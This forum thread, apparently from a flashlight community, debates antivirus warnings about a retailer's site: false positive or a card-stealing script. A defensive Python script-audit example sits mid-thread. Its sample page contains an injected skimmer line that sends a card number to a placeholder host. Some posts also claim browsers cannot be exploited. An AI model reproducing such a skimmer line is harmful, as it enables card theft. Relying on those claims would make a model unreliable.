Intl - outdoor Site is now working fine, free from any threats (if there were any). Will keep updated.

Today malware was reported by more than a few different scanners.

https://www.reddit.com/r/flashlight/comments/etpkkk/avast_warns_that_intloutdoorcom_is_infected_with/

I had this, too. The server our website runs on was hacked, and some code was integrated into the pages. I know it was a real threat because at that time I had hand-written the pages and could read what’s going on. It’s easy to catch data that is going to be sent back to the server and forward it to someone. Fortunately, this kind of code is JavaScript running on the client so Anti-Malware can find it.

==

The Reddit thread has more and more up to date information on what’s going on with the website.
https://www.reddit.com/r/flashlight/comments/etpkkk/avast_warns_that_intloutdoorcom_is_infected_with/

PS: A good illustration of a drive-by Trojan attack - Andrew Patrick


If you keep your browser updated, you probably will never have problems with this sort of thing.
It only happens using a browser vulnerability.

So if you are told it can never happen, that’s true, IF you keep your browser updated and if you don’t happen to be targeted by a new attack before the protection tools are updated to block it (a “zero day” attack).

As they say, “do ya feel lucky? Do ya?”

Most of us are lucky most of the time.

I noticed about a week ago [still showing] on intl outdoor a Norton warning stating: Unsafe - Threats 17.

That’s not true. A vulnerability does not need your permission and will not be so kind to ask for consent.

While the wild west days of IE and third party vectors (Adobe/Flash) are history, the complexity of modern web browsers brings many opportunities for the wicked.

That is untrue and dangerous to spread. There is malware that can infect you without ever clicking a “bad link”, etc.

Example?
I haven’t heard of any.
Sure there may have been exploits for small things, like leaking some info about you etc, but none that allowed execution of code on the client. Spectre/meltdown is mostly bs. In theory you can exploit it to steal things from memory, but in practice chances you get something useful out of it are 0.

I did a lot of kiddy-hacking when I was in high-school. Those were some interesting times because you could get trojans from everywhere. There was mIRC and people were accepting exes easily :) And there was a trojan called sub7 that was spread very fast and you could find many infected PCs just by scanning IPs and ports and then connect to them and take full control over their computer. Very fun times.
But now it’s different. There are many more people on the internet today, but all that stuff is almost impossible to do. It’s very hard to get full access to other computers mainly because software is now sandboxed, and very hard to access data over network because of HTTPS.

Let’s see, who should I trust about zero day risk — Malwarebytes and Bill Gates, or some guy on the Internet?

What, me worry?

There is no virus on our site, we have already reported this issue to Norton, I believe they will remove our site from the black list in several days time.

BTW if someone wants to report a false positive for avast:

I think they got triggered by the credit card fast checkout JavaScript. That or there is really another script hidden somewhere that steals the credit card info.
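An added example, not part of the thread and not the site's code: the question raised in the posts above (legitimate checkout JavaScript versus code injected into the pages) is usually approached by inventorying which scripts a page actually loads. The hostnames, the allowlist and the two regex heuristics are assumptions made for this sketch; a hit means "read this script", not "infected".

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample checkout page; every hostname is a placeholder.
SAMPLE_PAGE = """
<script src="/js/checkout.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
<script src="https://stats-collect.example.org/a.js"></script>
<script>document.forms[0].onsubmit = function () { new Image().src =
  "https://stats-collect.example.org/p?d=" + this.card_number.value; };</script>
"""
# Heuristics chosen for this example (assumptions, not any scanner's signatures).
CARD_FIELDS = re.compile(r"card|cc[-_]?num|cvv|cvc", re.I)
NETWORK_SINKS = re.compile(r"XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image", re.I)

class ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._buf = [], [], None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            if a.get("src"):
                self.external.append((a["src"], a.get("integrity")))
            else:
                self._buf = []  # start buffering an inline script body
    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None

def audit_scripts(html, page_host, allowed_hosts):
    collector = ScriptCollector()
    collector.feed(html)
    findings = []  # (finding, location) pairs for a person to review
    for src, integrity in collector.external:
        host = urlparse(src).hostname or page_host  # relative URL = first party
        if host != page_host and host not in allowed_hosts:
            findings.append(("unexpected-host", src))
        elif host != page_host and not integrity:
            findings.append(("no-sri", src))  # third party, no integrity hash
    for i, body in enumerate(collector.inline):
        # A real checkout script can match too, so this flags for review only.
        if CARD_FIELDS.search(body) and NETWORK_SINKS.search(body):
            findings.append(("inline-reads-card-and-sends", f"inline#{i}"))
    return findings
```

Calling `audit_scripts(SAMPLE_PAGE, "shop.example.com", {"cdn.example.net"})` returns three findings, and diffing that result against a known-good copy of the page is what separates a new injected script from the checkout code that was always there.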

Very dangerously incorrect. Unfortunately browsers are not safe sandboxes, as would be desirable.

Arbitrary/remote code execution vulnerabilities do exist. Just one very recent example with known “targeted attacks in the wild abusing this flaw”: Security Vulnerabilities fixed in Firefox 72.0.1 and Firefox ESR 68.4.1 — Mozilla

Browsers can and do have vulnerabilities, which luckily usually get patched quickly. Plug-ins extend the attack surface and those don’t get as frequently updated, so it’s best to stick to well-known and well-maintained ones. And that’s not even getting into JavaScript which is a security headache.

Then read again hank’s post. You’ve been provided some real world infection examples yet you refuse to acknowledge that.

It’s all well and good to come on here and declare ‘it’s all safe, nobody needs to worry’ or ‘it’s a false positive, it’s safe, report it to your antivirus’. But with respect, whilst everyone’s antivirus is flagging this as a trojan card stealer, not just mine, I’ll go with the advice of the security companies for now, rather than the word of someone I don’t know at all, and since I am not qualified or know for sure it’s not a trojan it’s probably not a good idea to suggest people report it as a ‘false positive’ as they don’t know, and nor do you.
The truth is YOU don’t know for sure at all, you are just best guessing.
Until such time as it is declared safe, I’d be wary about suggesting people ignore all the warnings and go ahead using the site as normal/buying. Of course if people want to, fine.

For now, it is only Norton that reports a “virus alert” for our site; all the other major “virus scan sites”, including Kaspersky and ESET, verify our site as SAFE, you can check it.
Norton uses outdated information; they will refresh their “black list” soon.

My Avast is still blocking it.

I can access it just fine with a VM running Avast and another running Norton.

I don’t see any problems with his site either. Win10 + Defender

Also Google doesn’t report anything: Google Transparency Report

Norton has it blacklisted for no apparent reason though.

Well Avast is selling user data so it’s not like you can completely trust antiviruses, a lot of the time they give false positives on stuff that’s actually just a normal part of how the software/site works.